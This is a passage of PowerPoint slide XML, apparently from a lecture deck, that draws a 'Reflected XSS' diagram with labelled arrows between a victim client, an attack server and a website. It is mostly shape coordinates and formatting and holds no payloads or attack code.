          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="301625" y="4130040"/>
            <a:ext cx="1379220" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Victim</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20940000">
            <a:off x="3039428" y="2019637"/>
            <a:ext cx="1478043" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>visit </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-232" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>site</a:t>
            </a:r>
            <a:endParaRPr sz="3000" baseline="2777">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="2178050"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2717296" y="2185352"/>
            <a:ext cx="164465" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Title 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73775A0E-A397-BB44-BE3C-79FC5F1D692C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Reflected XSS</a:t>
            </a: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09600" y="2907136"/>
            <a:ext cx="1417532" cy="1264284"/>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5631877" y="2133600"/>
            <a:ext cx="2301433" cy="846137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6016625" y="1767840"/>
            <a:ext cx="1520825" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2046288" y="2169971"/>
            <a:ext cx="3115945" cy="667385"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3115945" h="667385">
                <a:moveTo>
                  <a:pt x="0" y="666891"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3115751" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5109603" y="2130986"/>
            <a:ext cx="121635" cy="91421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="301625" y="4130040"/>
            <a:ext cx="1379220" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Victim</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20940000">
            <a:off x="3039428" y="2019637"/>
            <a:ext cx="1478043" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>visit </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-232" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>site</a:t>
            </a:r>
            <a:endParaRPr sz="3000" baseline="2777">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2141833" y="2532063"/>
            <a:ext cx="3345179" cy="751840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3345179" h="751839">
                <a:moveTo>
                  <a:pt x="3344565" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="751639"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2072757" y="3231015"/>
            <a:ext cx="121762" cy="91280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20880000">
            <a:off x="2583092" y="2558458"/>
            <a:ext cx="2540663" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>receive </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-187" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
            <a:endParaRPr sz="3000" baseline="2777">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="2178050"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="182562" y="365124"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="218344" y="3540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283848" y="30672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334452" y="81276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361584" y="146780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="2178050"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2717296" y="2185352"/>
            <a:ext cx="164465" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="2835275"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="182562" y="365124"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="218344" y="3540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283848" y="30672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334452" y="81276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361584" y="146780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
